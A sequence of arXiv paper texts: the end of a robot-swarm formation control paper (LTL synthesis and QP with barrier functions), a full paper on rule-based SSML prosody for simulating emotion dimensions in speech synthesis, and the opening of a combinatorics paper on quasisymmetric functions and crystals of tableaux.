The constant parameters \(\alpha_{1}\), \(\alpha_{2}\), \(\gamma_{1}\), \(\gamma_{2}\) are chosen as \(\alpha_{1}=\alpha_{2}=\frac{\mu\pi}{2T_{ud}}\), \(\gamma_{1}=1+\frac{1}{\mu}\), \(\gamma_{2}=1-\frac{1}{\mu}\) with \(\mu>1\). In (7), different constraints are concerned with task specifications and runtime safety requirements, respectively. Constraint (7c) requires the swarm centroid \(x_{c}\) to reach a given waypoint \(w\in W\), constraint (7d) drives the swarm to a given formation \(\{f_{ij}\}_{(i,j)\in\mathcal{E}}\), and constraints (7e) and (7f) attempt to keep the robots within the safety sets \(\mathcal{D}\) and \(\mathcal{O}\). #### Iv-B2 Convergence Analysis of QP The convergence property of the closed-loop system evaluates whether the swarm reaches the given waypoint \(w\in W\) and formation \(F^{\prime}\in F\) sufficiently soon. From a theoretical perspective, it evaluates whether \(x_{c}\), \(x_{ij}\) enter the bounded sets \(\mathcal{W}(w)\), \(\mathcal{F}(f_{ij})\) for all \(f_{ij}\in F^{\prime}\), \((i,j)\in\mathcal{E}\), within the given fixed time \(T_{ud}\), from any initial robot positions \(x_{i}(0)\in\mathbb{X}\), \(i\in\mathcal{V}\). Convergence is an important guarantee for the satisfaction of the task specification \(\psi\) and is prescribed by the feasibility of the constraints (7c) and (7d). Involving the slack variable \(\delta_{1}\in\mathbb{R}^{+}\) can effectively relax these constraints and improve their feasibility. Nevertheless, the input limitation (7b) also affects their feasibility. In [21], it is argued that larger values of \(T_{ud}\) and \(u_{\mathrm{max}}\) lead to a larger fixed-time domain of attraction, which means that a larger set of initial robot conditions allows the swarm system to reach the given waypoint \(w\) and formation \(F^{\prime}\) within time \(T_{ud}\). We can infer that there exist \(\overline{T}_{ud}\in\mathbb{R}^{+}\) and \(\overline{u}_{\mathrm{max}}\in\mathbb{R}^{+}\), such that for any \(x_{i}(0)\in\mathbb{X}\), \(i\in\mathcal{V}\), \(x_{c}\) and \(x_{ij}\) reach \(\mathcal{W}(w)\) and \(\mathcal{F}(f_{ij})\) within \(T_{ud}\) for all \(f_{ij}\in F^{\prime}\in F\), \((i,j)\in\mathcal{E}\), if \(T_{ud}>\overline{T}_{ud}\) and \(u_{\mathrm{max}}>\overline{u}_{\mathrm{max}}\). #### Iv-B3 Runtime Safety Runtime safety describes whether the robots remain collision-free for all time. From a theoretical perspective, it asks whether, given \(x_{i}(0)\in\mathcal{O}\) and \(x_{i}(0)-x_{j}(0)\in\mathcal{D}\), the conditions \(x_{i}(t)\in\mathcal{O}\) and \(x_{i}(t)-x_{j}(t)\in\mathcal{D}\) hold for all \(t\in\mathbb{R}_{\geq 0}\). Runtime safety is ensured by the feasibility of constraints (7e) and (7f). Similar to the constraints concerned with convergence, the feasibility of these constraints can also be improved by the slack variable \(\delta_{2}\in\mathbb{R}^{+}\). However, when the robots reach the boundaries of the sets \(\mathcal{D}\) and \(\mathcal{O}\), i.e., there exists \(i\in\mathcal{V}\) such that \(h_{\mathcal{O}}(x_{i})=0\), or there exists \((i,j)\in\mathcal{E}\) such that \(h_{\mathcal{D}}(x_{ij})=0\), \(\delta_{2}\) loses its effect in constraint (7e) or (7f), and these become hard constraints. Nevertheless, these constraints are still feasible in this case: at least the trivial solution \(u_{i}=0\) or \(u_{ij}=0\) exists.
Note that the _deadlock_ phenomenon may occur when \(u_{i}=0\), \(h_{\mathcal{O}}(x_{i})=0\), \(u_{ij}=0\), \(h_{\mathcal{D}}(x_{ij})=0\) hold for all \(i\!\in\!\mathcal{V}\) and \((i,j)\!\in\!\mathcal{E}\)[28]. How to avoid deadlock has always been a challenging problem and remains an open question. It is commonly recognized that deadlock is due to the over-conservativeness of the runtime safety constraints, which provokes extreme actions of the robots. For example, the swarm is asked to squeeze into a narrow corridor or it is stuck in a dead corner of an odd-shaped obstacle. In our framework, we can prescribe the task specifications at the high-level such that the swarm can avoid going through narrow corridors or stay away from odd-shaped obstacles. In this sense, we can greatly reduce the likelihood of the deadlock phenomenon. ## V Case Study In this section, we use a swarm navigation control case in simulation to validate the efficacy of our proposed framework and solution. Consider a homogeneous swarm system that contains \(N=3\) quadrotor robots moving in a two-dimensional planar environment \(\mathbb{X}\subset\mathbb{R}^{2}\), where \(\mathbb{X}\) is a \(5\,\mathrm{m}\)\(\times\)\(5\,\mathrm{m}\) square area. The dynamic model of the \(i\)-th robot of the swarm system is given as the following single integrator \(\dot{x}_{i}(t)=u_{i}(t)\), \(i=1,2,3\), where \(x_{i}(t),u_{i}(t)\in\mathbb{R}^{2}\) are the position and control input of robot \(i\), respectively, at time \(t\!\in\!\mathbb{R}_{\geq 0}\). The terrain of the environment \(\mathbb{X}\) is illustrated in Fig. 1. The environment is split into a \(5\times 5\) grid which generates 25 even square blocks, each with a size of \(1\,\mathrm{m}\)\(\times\)\(1\,\mathrm{m}\). The yellow block is the starting point of the robot swarm. The blue block is the navigation goal that the swarm needs to reach ultimately. The red blocks are the obstacles that the robots should avoid. The waypoints are assigned as the centroids of the square blocks, which brings up \(N_{W}\!=\!|W|\!=\!25\). Also, we determine three different formations \(F=\{F^{1},F^{2},F^{3}\}\), where \(F^{k}=\{f^{k}_{12},f^{k}_{23},f^{k}_{13}\}\), \(k=1,2,3\). \(F_{1}\), \(F_{2}\), \(F_{3}\) give a horizontal formation (as shown in Fig. 1b and Fig. 1d), a vertical formation (as shown in Fig. 1a and Fig. 1e), and a triangle shape formations (Fig. (c)c), respectively. The values of the elements of \(W\) and \(F\) can be found in our online document on Github [29]. The DFTS \(\mathcal{T}\!=\!\{S,A,\delta,\mathsf{AP},\mathcal{L}\}\) as the abstract model of the quadrotor swarm is realized as follows. The state space \(S=\tilde{W}\!\times\!\tilde{F}\), where \(\tilde{W}\), \(\tilde{F}\) are realized as finite sets with \(25\) and \(3\) elements, respectively. The transition relation \(\delta\) is represented as a matrix and can also be found in our Github repository [29]. The main principles we use to construct the transition relation are as follows. * When the swarm pass by a narrow corridor, it should switch to the proper formation to fit its direction. * The swarm should not enter an obstacle region. The atomic proposition set is \(\mathsf{AP}=\mathsf{AP}_{w}\!\times\!\mathsf{AP}_{f}\), where \(\mathsf{AP}_{w}=\{\text{freespace, home, goal, obstacle}\}\) and \(\mathsf{AP}_{f}=\{\text{horizon, vertical, triangle}\}\). The label mapping is \(\mathcal{L}=\{\mathcal{L}_{w},\mathcal{L}_{f}\}\). \(\mathcal{L}_{w}\) labels the yellow block in Fig. 
1 as "home", the blue block as "goal", the red blocks as "obstacle", and all other blocks as "freespace". \(\mathcal{L}_{f}\) is defined such that \(\mathcal{L}_{f}(F^{1})=\text{``horizon"}\), \(\mathcal{L}_{f}(F^{2})=\text{``vertical"}\), and \(\mathcal{L}_{f}(F^{3})=\text{``triangle"}\). The abstract model is visualized in Fig. 2, where the \(x\)-\(y\) planes along the formation axis show the planar view of the environment for different formations. Thus, Fig. 2 clearly shows the transition between the \(25\times 3\) states of the DFTS. The task is specified as an LTL formula \(\psi\!=\!\psi_{1}\!\rightarrow\!\psi_{2}\), where \[\psi_{1} :=\!\square(\neg\text{battery}\wedge\text{home}\rightarrow\bigcirc \text{battery})\] \[\wedge\square(\neg\text{battery}\wedge\neg\text{home}\rightarrow \bigcirc\neg\text{battery}),\] \[\psi_{2} :=\!\square\neg\text{obstacle}\wedge\square\lozenge(\text{goal }\wedge\text{triangle}\lozenge\text{battery},\] where "battery" is a binary variable used to describe the energy level of the robot batteries. If all robots have full batteries, "battery" is true. Otherwise, it becomes false. The specification \(\psi\) can be interpreted in the following natural language. 1. The swarm should infinitely visit "goal" in "triangle" formation, as long as "battery" is true. 2. All robots should avoid entering regions with obstacles. 3. The swarm should go back "home" to recharge once "battery" becomes false. The runtime safety requirements are formulated as bounded sets defined in Sec. III and encoded in the QP problem (7). The parameters of the bounded sets and the QP problem in (7) can also be found in our Github repository [29]. We give two important parameters \(T_{ud}\!=\!4\,\mathrm{s}\) and \(u_{\max}\!=\!5\,\mathrm{m}\)/s. The synthesis of the symbolic control strategy is solved using an off-the-shelf LTL toolbox, TuLiP [26]. The QP problem is solved using the CasADi library [30] with the ipopt solver on a commercial laptop with CPU i7-10750H. We apply the synthesized control strategy and the solution of the QP to the DFTS and the robots, respectively As a run of the simulation, we let the swarm start at "home" with a "vertical" formation. The trajectories of the robots in the environment as time changes are shown in Fig. 1. After leaving "home", the swarm goes along the horizontal corridor in a "horizon" formation, as shown in Fig. (a)a, since the narrow space does not allow other formations. In Fig. (b)b, the robot turns right and proceeds in the short horizontal corridor. It has to change to a "horizon" formation to fit the narrow space. When it passes the corridor and ultimately reaches the "goal" in the open space, it switches to the triangle formation as specified by \(\psi\), as shown in Fig. (c)c. In Fig. (d)d, at least one robot has a low battery, which set the signal "battery" as false. Fig. 1: The planar view of the environment and the robot trajectories in a simulation run, as time changes (left to right). Fig. 2: The visualization of the states of the abstract model. The three planes distributed along the \(z\)-axis are the environment with waypoints corresponding to three formations. Each small square block is an abstract state. The blue line denotes the transition of the abstract states in a simulation run. The bypassing waypoints are marked as red dots. swarm goes back to "home". Once it gets charged at "home" and the "battery" signal is true again, the robot resumes its previous task to navigate itself to the "goal" again, as shown in Fig. 0(e). 
From Fig. 1, we can see that the controlled swarm ensures an obstacle-free trajectory when approaching to the desired task. Also, proper formations are automatically selected to traverse narrow areas. The resulting behavior of the robot swarm completely satisfies the LTL specifications. This is also reflected by Fig. 2 which visualizes the trajectory of the robot swarm in the abstract space. Following the trajectory, we can infer similar conclusions to the above arguments that the task specification is satisfied. Therefore, we do not elaborate detailed interpretations for all abstract states. A video demonstration of this use case is available at [https://www.youtube.com/watch?v=rlaecB0eDq0](https://www.youtube.com/watch?v=rlaecB0eDq0). Now, let us inspect whether the swarm system satisfies the runtime safety requirements. Fig. 3 displays the trajectories of the robots when the swarm is given a new waypoint and formation. In this case, all robots start from the same initial position \(O\) and they are assigned with a waypoint. The green rounded region is the tolerated set of waypoint reaching. The robot swarm is required to achieve a "triangle" formation when its center reaches the waypoint. During this period, all robots should avoid collision with the red rounded obstacle. In Fig. 3, the trajectories of the robots are drawn as solid lines and the formation of the swarm is in dotted lines. It is shown that the robots successfully avoid the obstacle and finally reach the waypoint at a tolerable range. The ultimate formation is "triangle" and the reaching time is within \(T_{ud}\!=\!4\,\mathrm{s}\). This study shows that the robot controller solved from the QP problem strictly ensures not only the runtime safety requirements but also the fixed-time convergence condition. ## VI Conclusion In this paper, we develop an automated multi-robot formation synthesis framework via formal control method and QP-based controller design method to solve complex tasks for multi-robot swarm systems, where the task specifications are defined on multiple domains. The main challenge of the proposed framework is the realization of the abstract model of the swarm system. In this framework, symbolic control synthesis is performed to determine waypoints and formations that enable an abstract model of the swarm system as a DFTS. Meanwhile, feasible and safe multi-robot controllers are achieved by solving a QP problem, while fixed-time CLFs and safety-guaranteed CBFs that encode the runtime safety requirements are incorporated to enable automated multi-robot controller generation. A simulation case study validates the efficacy of the method to LTL specifications. In the proposed multi-robot swarm solution, the definition of the waypoints and formations can be generalized to incorporate other types of goals, and therefore the proposed framework can be extended to more complicated robotic tasks. We remark that the robot trajectories generated by the symbolic controller show some 'jerky' behaviors. Future work will also investigate the generation of smooth robot trajectories.
2307.02132
Going Retro: Astonishingly Simple Yet Effective Rule-based Prosody Modelling for Speech Synthesis Simulating Emotion Dimensions
We introduce two rule-based models to modify the prosody of speech synthesis in order to modulate the emotion to be expressed. The prosody modulation is based on speech synthesis markup language (SSML) and can be used with any commercial speech synthesizer. The models as well as the optimization result are evaluated against human emotion annotations. Results indicate that with a very simple method both dimensions arousal (.76 UAR) and valence (.43 UAR) can be simulated.
Felix Burkhardt, Uwe Reichel, Florian Eyben, Björn Schuller
2023-07-05T09:20:46Z
http://arxiv.org/abs/2307.02132v1
Going Retro: Astonishingly Simple Yet Effective Rule-based Prosody Modelling for Speech Synthesis Simulating Emotion Dimensions Going Retro: Astonishingly Simple Yet Effective Rule-based Prosody Modelling for Speech Synthesis Simulating Emotion Dimensions Felix Burkhardt\({}^{1}\), Uwe Reichel\({}^{1}\), Florian Eyben\({}^{1}\), Bjorn Schuller\({}^{1,2,3}\) \({}^{1}\)_audEERING GmbH, Germany, \({}^{2}\)Chair EIHW, University of Augsburg, Germany, \({}^{3}\)GLAM, Imperial College London, UK [email protected]_ **Abstract:** We introduce two rule-based models to modify the prosody of speech synthesis in order to modulate the emotion to be expressed. The prosody modulation is based on speech synthesis markup language (SSML) and can be used with any commercial speech synthesizer. The models as well as the optimization result are evaluated against human emotion annotations. Results indicate that with a very simple method both dimensions arousal (.76 UAR) and valence (.43 UAR) can be simulated. ## 1 Introduction Affect-modulated speech synthesis of a text can be achieved amongst others by modifying the prosody of the utterance accordingly [1]. In this work, emotions will be represented in terms of the dimensional approach of Schlosberg [2], who identified the three emotion dimensions valence, arousal, and dominance. _Valence_ is referred to as _pleasure_ in the following. For this paper, we neglect the dominance dimension for the benefit to focus on the main topic: the control of emotional expression in speech synthesis with a very limited set of prosodic rules. ### Acoustic correlates of emotions For each of these dimensions, several acoustic correlates have been found. These findings are summarized in [3], [4], and [5] (for further details please see the references therein). High as opposed to low arousal is characterized by higher speech rate, higher intensity mean and variability, higher fundamental frequency (\(F_{0}\)) mean and variability, higher spectral balance indicating increased vocal effort, and a higher first formant due to an increased mouth opening. Positive as opposed to negative pleasure is amongst others characterized by higher speech rate and by lower intensity mean and variability. In addition, pleasure is positively correlated with the second formant due to more lip spreading caused by smiling [6]. The relation between pleasure and pitch is more complicated as found by [7, 1, 8]: Higher \(F_{0}\) characterizes both elation joy (positive) and fear (negative), while comfort (positive) and boredom (negative) are both reflected by lower \(F_{0}\)[1]. In general, many results from the literature, for example [9, 10, 11], indicate that it is difficult to predict and simulate the valence dimension by acoustic cues alone, as opposed to linguistic ones, an assumption that is confirmed also in this investigation. ### Emotions in speech synthesis There are many articles that deal with the simulation of emotional speech and even many that review them, for example [12, 13, 14]; we refer to these for a deeper discussion. Historically, first algorithms to simulate emotional expression were based on prosody rules and categorical emotions. Later, and in line with the new statistical techniques to synthesize speech, data based approaches were used and emotional dimensions as well as speaking styles targeted. Triantafyllopoulos et al. review deep learning based approaches in [15]. 
Marc Schroder was the first on to target emotional dimensions with prosody rules in his dissertation [11] and his work is one of the foundations of this paper. An approach to simulate emotion dimensions with learned features was presented by Hamada [10] by mapping acoustic features to the valence-arousal space. Later, Stanton et al. [16] showed how to target the latent space within a Tacotron architecture to generate expressive speaking styles. ### Emotional simulation with SSML Within the scope of the European H2020 EASIER project [17], we faced the problem to enable a, not-yet emotional but available in many languages, commercial speech synthesizer to simulate emotional expression. The obvious way to do this, in a way that is agnostic to a specific synthesizer, is to utilize the W3C's Speech Synthesis Markup Language (SSML) [18] which is, at least in parts, interpreted by almost all speech synthesis engines that are available. This has also been done for categorical emotions by Shaikh et al. [19]. SSML amongst others allows for specifying prosodic modifications of an utterance along the prosodic dimensions pitch, energy, and duration. Thus, speech synthesis can be affect-modulated by mapping emotion dimensions to prosodic parameters based on the findings above, and by passing on these parameters to the Text to speech (TTS) engine via SSML. We tested this for the commercial Google Speech API1 and the open source MARY TTS engine [20], where the support is only partial. Footnote 1: [https://cloud.google.com/text-to-speech](https://cloud.google.com/text-to-speech) This paper is structured as follows: In section 2, we introduce two rule-based model variants in order to adapt the prosody of an utterance accordingly. In sections 3 and 4, we describe the perceptual evaluation procedure and their results, respectively. Section 5 concludes the paper with an outlook. Contributions of this paper are as follows: * We present two approaches to simulate emotional dimensions with SSML, which has to our knowledge not been done before. * We simulate the valence dimension by a very simple pitch manipulation approach. ## 2 Rule-based affect modulation In our study, emotion scores are mapped to speech prosody parameters in two rule-based algorithms based on the findings introduced in section 1. ### Method syntact As a naive baseline we simply implemented the prosody rules as being positively correlated with pitch and speech rate. To distinguish between arousal and valence, we simply assigned speech rate to arousal and pitch to valence, an approach that worked surprisingly well. Of course, we can not be sure if the outcomes are specific to the Google synthesizer that was used to generate the samples. ### Method Schroeder To try out a more complex approach than Syntact, we implemented a very reduced version of the approach that Marc Schroder described in his dissertation [21]. To this end, we analyzed Schroeder's MARY TTS [20] sources 2. According to the sources, we extracted the rules displayed in Listing 2.2, originally in Java, and implemented them in the Python language. 
Footnote 2: [https://github.com/marytts/marytts/blob/79e4edef3f478dcef0aad3609ba77090e91f0b6d/marytts-client/src/main/resources/marytts/tools/emospeak/emotion-to-mary.xsl](https://github.com/marytts/marytts/blob/79e4edef3f478dcef0aad3609ba77090e91f0b6d/marytts-client/src/main/resources/marytts/tools/emospeak/emotion-to-mary.xsl)

```
pitch => 0.3*arousal + 0.1*valence - 0.1*power
pitch-dynamics => -15 + 0.3*arousal - 0.3*power
range (in semitones) => 4 + 0.04*arousal
range-dynamics (min 100) => -40 + 1.2*arousal + 0.4*power
accent-prominence => 0.5*arousal - 0.5*valence
preferred-accent-shape => when valence < -20: falling,
    when valence > 40: alternating, else rising
accent-slope => 1*arousal - 0.5*valence
rate => 0.5*arousal + 0.2*valence
number-of-pauses => 0.7*arousal
pause-duration => -0.2*arousal
vowel-duration => 0.3*valence + 0.3*power
nasal-duration => 0.3*valence + 0.3*power
liquid-duration => 0.3*valence + 0.3*power
plosive-duration => 0.5*arousal - 0.3*valence
fricative-duration => 0.5*arousal - 0.3*valence
volume => 50 + 0.33*arousal
```

To implement this in SSML, we filtered the list for pitch and speech rate global values, resulting in the two rules shown in Listing 2.2. These rules had already been tested in the scope of a project to generate an appropriate robot voice for children with the autistic spectrum [22]. The resulting values were then scaled as described in the next section. Of course, this is only a very small subset of the rules defined by Marc Schroder, and this might well be the main reason that this approach did not prove to be very successful.

```
pitch => 0.3*arousal + 0.1*valence - 0.1*power
rate => 0.5*arousal + 0.2*valence
```

Listing 2: Reduced prosody rules according to the MARY emotion module

### Mapping from dimensions to rules

We adapted the emotion-to-prosody mapping approach of [23]: values for the emotion dimensions arousal and pleasure are mapped to the _pitch_, _rate_, and _volume_ attributes of the SSML element \(<\)prosody\(>\). This mapping is carried out in the following way:

1. rescale the scores of emotion dimension \(e\in\{\)pleasure, arousal\(\}\) to the range \([-1,1]\);
2. calculate each of the prosody parameters \(y\in\{\)pitch, rate, volume\(\}\) by the following linear combination \[y=\sum_{e\in\{\text{pleasure, arousal}\}}w_{e,y}\cdot e \tag{1}\]
3. rescale \(y\) to a range defined by still natural sounding minimum and maximum values of the respective prosody dimension.

For both variants, Schroeder and Syntact, all weights \(w_{e,y}\) of emotion dimension \(e\) for the calculation of the prosodic dimension \(y\) were set manually, based on perceptual expert judgments of how well the synthesized speech prosodically matches the intended emotions. [23] showed that emotion recognition performance can be increased by adding emotional speech samples synthesized this way to the training data. For reproducibility, all code is open sourced in the Syntact GitHub repository. Footnote 3: [https://github.com/felixbur/syntAct](https://github.com/felixbur/syntAct)

## 3 Perceptual Evaluation

We conducted a perception experiment to validate the effectiveness of the approaches. We used the Google Speech API as a speech synthesizer, with the standard male and female voices.
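As an illustration of the mapping above, the following hedged sketch shows how a Syntact-style assignment (arousal to rate, valence/pleasure to pitch) could be turned into an SSML \(<\)prosody\(>\) string; the percentage ranges are placeholders and not the tuned values released in the Syntact repository.

```
# Hedged sketch of a Syntact-style mapping (Sec. 2): arousal drives rate,
# valence drives pitch.  The SSML attribute ranges below are placeholders.

def to_unit_range(v, lo=0.0, hi=1.0):
    """Rescale an emotion score from [lo, hi] to [-1, 1]."""
    return 2.0 * (v - lo) / (hi - lo) - 1.0

def emotion_to_ssml(text, arousal, valence):
    a, v = to_unit_range(arousal), to_unit_range(valence)
    rate  = 100 + 30 * a           # speaking rate as a percentage, e.g. 70% .. 130%
    pitch = 20 * v                 # relative pitch change in percent, e.g. -20% .. +20%
    return (f'<speak><prosody rate="{rate:.0f}%" pitch="{pitch:+.0f}%">'
            f"{text}</prosody></speak>")

# High arousal, neutral valence:
print(emotion_to_ssml("In sieben Stunden wird es soweit sein.", arousal=0.9, valence=0.5))
```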
As text material, we used two short sentences of the Berlin Emotional Database [24], which are meant to be emotionally undecided: * "_In sieben Stunden wird es soweit sein._" (_It will happen in seven hours._) * "_Heute Abend konnte ich es ihm sagen._" (_I could tell him tonight._) The idea is that these sentences are neither too mundane nor already carry a linguistic emotional connotation. These four combinations (two sexes times two sentences) were synthesised with both methods and with all 9 combinations of three valence and three arousal levels (\(.1,.5,.9\), with \(.5\) being the neutral level), resulting in 72 samples (\(2\cdot 2\cdot 2\cdot 9\)). The samples were annotated by 10 subjects employed by audEERING GmbH using the I-hear-U-play platform [25]. The labelers were 6 women and 4 men of mean age 34.87 years with 13.79 years standard deviation. After judging 10 test samples to get acquainted with the task, they answered for each sample the following two questions: * "_Please rate the arousal level on a scale of low, mid, and high._" * "_Please rate the valence level on a scale of negative, neutral, and positive._" To measure the inter-rater agreement we used Fleiss' kappa; the results are depicted in Table 1. While the raters reached moderate agreement on the arousal annotations, agreement on valence is only slight for the Syntact method and negligible for the Schroeder method. \begin{table} \begin{tabular}{r|c c} Fleiss’ \(\kappa\) & **Arousal** & **Valence** \\ \hline **Schroeder** &.467 &.067 \\ **Syntact** &.445 &.121 \\ \hline **All** &.461 &.112 \\ \end{tabular} \end{table} Table 1: Fleiss’ kappa values for inter-rater agreement on arousal and valence levels for the methods Schroeder, Syntact, and all values combined. ## 4 Results The results of the perception experiment are shown in Table 2. The confusion matrix for the arousal dimension levels is shown in Figure 1 and for the valence dimension in Figure 2. The results were computed based on all listeners' ratings, without a unified label. As can be seen, the simulation of arousal was successful with both approaches, but to a clearly higher degree with the simpler Syntact method. For the Schroeder method, low arousal is often confused with the neutral versions, and the neutrally meant samples with high arousal. With respect to valence, we must admit that we were only partly successful with the Syntact method. As outlined above, this may largely be due to the fact that valence is mostly conveyed by linguistic information. This has recently been shown again for deep acoustic representations, which succeed in better automatic valence recognition from speech due to their inherent encoding of linguistics [26]. Nonetheless, we think this is a valuable finding, because the method essentially hypothesizes that valence correlates positively with pitch, an interesting approach given its simplicity. The samples generated by the Schroeder method were labeled as neutral or high valence by the majority of the listeners, an outcome that perhaps indicates that the "normal" expression of the Google voices is rather friendly. As discussed in Section 1, it is quite difficult to simulate the valence dimension by acoustic cues alone, and accordingly, we are satisfied to have reached even a partial success. Figure 1: Confusion matrices between intended and perceived arousal levels. Left: model Schroeder, Right: model Syntact Figure 2: Confusion matrices between intended and perceived valence levels.
Left: model Schroeder, Right: model Syntact ## 5 Conclusion and Outlook This paper investigated two methods to simulate emotional expression in speech synthesis by controlling prosody with SSML. The chosen method following a (strongly) reduced version of Marc Schroder's work did not outperform our rather naive baseline. Of course, we cannot be sure if the outcomes are specific to the Google synthesizer that was used to generate the samples. Hence, a more general investigation that includes several speech engines will remain future work. Also, it is much more promising to learn emotion-to-expression rules from data than to manually determine them based on isolated trials, amongst others because emotional expression is at least to a degree culture specific and the same rules can not be applied in all cultural and social contexts. This has to our knowledge not yet been done for SSML-based approaches and also remains future work. Thirdly, we restricted the investigation on two dimensions; valence and arousal. Future studies will take at least the dominance dimension into account, which is important to distinguish for example _anger_ from _fear_. It further appears interesting to measure how automatic speech emotion recogniser would recognise such rule- and SSML-based samples. In addition, one could evaluate if they could be used for model augmentation as was first suggested in [27]. On the opposing end - and likewise closing the circle between analysis and synthesis, one could implement a related rule- and SSML-based recognition of emotion from speech. Presumably, however, this would require some form of speaker normalisation grounded in neutral speech, hence, requiring an enrolment procedure. ## 6 Acknowledgements This research has been partly funded by the European SHIFT (MetamorphoSis of cultural Heritage Into augmented hypermedia assets For enhanced accessibiliTy and inclusion) project (Grant Agreement number: 101060660).
2302.07694
Quasicrystal Structure of Fundamental Quasisymmetric Functions, and Skeleton of Crystals
We use crystals of tableaux and descent compositions to understand the decomposition of Schur functions $s_\lambda$ into Gessel's fundamental quasisymmetric functions $F_\alpha$. The connected crystal of tableaux $B(\lambda)$, associated to $s_\lambda$, is shown to be partitionned into a disjoint union of connected induced subgraphs $B(T_\alpha)$ corresponding to the $F_\alpha$'s. We show that these subgraphs, which we call quasicrystals, are isomorphic (as graphs) to specific crystals of tableaux. This allows us to give a formula for the number of tableaux of shape $\lambda$ and maximal entry $n$. We also use this setting to give a constructive proof of a combinatorial formula for Kostka numbers $K^\lambda_\mu$. We study the position of the quasicrystals within the crystal $B(\lambda)$, and show that they appear in dually positionned pairs, with the crystal anti-automorphism between them being given by a generalization of Sch\"utzenberger's evacuation. We introduce the notion of skeleton of the crystal $B(\lambda)$ given by replacing each subgraph $B(T_\alpha)$ by the associated standard tableau of shape $\lambda$. We conjecture that its graph includes the dual equivalence graph for $\lambda$, introduced by Assaf, and that its subgraphs of tableaux with fixed number of descents have particular structures. Finally, we describe applications to plethysm, among which we give an algorithm to express any symmetric sum of fundamental quasisymmetric functions into the Schur basis, whose construction gives insight into the relationship between the two basis.
Florence Maas-Gariépy
2023-02-15T14:38:52Z
http://arxiv.org/abs/2302.07694v1
# Quasicrystal Structure of Fundamental Quasisymmetric Functions, and Skeleton of Crystals ###### Abstract We use crystals of tableaux and descent compositions to understand the decomposition of Schur functions \(s_{\lambda}\) into Gessel's fundamental quasisymmetric functions \(F_{\alpha}\). The connected crystal of tableaux \(B(\lambda)\), associated to \(s_{\lambda}\), is shown to be partitionned into a disjoint union of connected induced subgraphs \(B(T_{\alpha})\) corresponding to the \(F_{\alpha}\)'s. We show that these subgraphs, which we call quasicrystals, are isomorphic (as graphs) to specific crystals of tableaux. This allows us to give a formula for the number of tableaux of shape \(\lambda\) and maximal entry \(n\). We also use this setting to give a constructive proof of a combinatorial formula for Kostka numbers \(K_{\mu}^{\lambda}\). We study the position of the quasicrystals within the crystal \(B(\lambda)\), and show that they appear in dually positionned pairs, with the crystal anti-automorphism between them being given by a generalization of Schutzenberger's evacuation. We introduce the notion of skeleton of the crystal \(B(\lambda)\) given by replacing each subgraph \(B(T_{\alpha})\) by the associated standard tableau of shape \(\lambda\). We conjecture that its graph includes the dual equivalence graph for \(\lambda\), introduced by Assaf, and that its subgraphs of tableaux with fixed number of descents have particular structures. Finally, we describe applications to plethysm, among which we give an algorithm to express any symmetric sum of fundamental quasisymmetric functions into the Schur basis, whose construction gives insight into the relationship between the two basis. ## Introduction Quasisymmetric functions were introduced by Gessel [19], in the context of the study of symmetric functions, which they generalise. Notably, the plethysm \(s_{\mu}[s_{\lambda}]\) of two Schur functions has been shown to be a sum of fundamental quasisymmetric functions [10]. Understanding the decomposition of such a plethysm into the Schur basis has been an open problem for more than 80 years, since its initial introduction by Littlewood [13]. Therefore, studying both the basis of fundamentatal quasisymmetric functions and Schur functions, and relations between them, has the potential of greatly advancing our understanding of plethysm. We propose here a study of Schur functions and fundamental quasisymmetric functions through crystal theory. We believe this to be of value, since both plethysm and crystal theory originate from representation theory. A _crystal_ is a visual representation of the character of a representation of a group in the shape of a labelled oriented graph on combinatorial objects. Irreducible characters then correspond to connected components of crystals, which then are crystals in their own right. A good introductory reference on crystals is _Crystals for dummies_[Shimozono, 2005]. For a thorough understanding, see _Crystal Bases_[Bump and Schilling, 2017]. We will focus on crystals of type \(A_{n-1}\), which correspond to characters of representations of \(GL_{n}\), which themselves are given by symmetric functions: formal power series such that permuting any two variables gives the same function. The Schur functions mentionned above encode the irreducible characters for \(GL_{n}\). 
The problem of decomposing a symmetric function into the basis of Schur functions then corresponds to breaking down a character (and the associated representation) into its smallest pieces: irreducible characters (or representations). In the setting of crystals, we are interested in understanding the decomposition of crystals into connected components \(B(\lambda)_{n}\), which then correspond to the Schur functions \(s_{\lambda}(x_{1},\ldots,x_{n})\). Furthermore, the following formula of Gessel [Gessel, 2019] tells us that these connected components can be decomposed further into subcomponents which then correspond to fundamental quasisymmetric functions. \[s_{\lambda}=\sum_{T\in\mathrm{SYT}(\lambda)}F_{DesComp(T)}\] Understanding this decomposition in the crystal setting is the first aim of the article. The second aim is to understand the added structure on quasisymmetric functions within the crystal structure, and relations between them. We show the following. **Theorem 1 :** The connected crystal \(B(\lambda)_{n}\) of tableaux of shape \(\lambda\) and maximal entry \(n\) is partitionned into disjoint connected induced subgraphs \(B(T_{\alpha})_{n}\) which correspond to quasisymmetric functions \(F_{\alpha}(x_{1},\ldots,x_{n})\), where the subsets of vertices are tableaux with a fixed descent composition \(\alpha\). The sources \(T_{\alpha}\) of these subcomponents have filling and _minimal parsing of type \(\alpha\)_. The number \(f_{\alpha}^{\lambda}\) of subgraphs of type \(\alpha\) is the number of standard tableaux of shape \(\lambda\) and descent composition \(\alpha\). As a consequence of the following theorem, we have that for a fixed composition \(\alpha\), all subcomponents \(B(T_{\alpha})_{n}\) are isomorphic as labelled oriented graphs (see corollary 3.2). Moreover this is true no matter the crystal \(B(\lambda)_{n}\) they live in, so no matter the shapes of the sources \(T_{\alpha}\). We denote the class of such subcomponents \(B(\alpha)_{n}\), and call them _quasicrystals_. We can then study their graph structure: **Theorem 2 :** Let \(\alpha\) be a composition of \(m\) in \(s\) parts. The quasicrystal \(B(\alpha)_{n}\) is isomorphic (as an oriented graph) to \(B(m)\) with maximal entry \(n-s+1\). In particular, the oriented graph structure of \(B(\alpha)_{n}\) is independant of partitions \(\lambda\) for which \(\alpha\) is a descent composition. An application of both theorems above, and of proposition 3.6, is the following formula, giving the number of tableaux with fixed shape \(\lambda\) and maximal entry \(n\). **Theorem 3 :** The number of tableaux of shape \(\lambda\) with maximal entry \(n\) is given by \[|SSYT(\lambda)_{n}|=\sum_{0\leq d\leq D}f_{d}^{\lambda}\cdot\left(\begin{array} []{c}|\lambda|+n-d-1\\ n-d-1\end{array}\right),\] where \(f_{d}^{\lambda}\) denotes the number of standard tableaux of shape \(\lambda\) with \(d\) descents, and \(D\) is the maximal number of descents in a standard tableau of shape \(\lambda\). The existence of "nice" formulas for counting tableaux has been an open question for many years. For the similar problem of giving a "nice" formula for Kostka numbers \(K_{\mu}^{\lambda}\), open for many years, it has been conjectured that 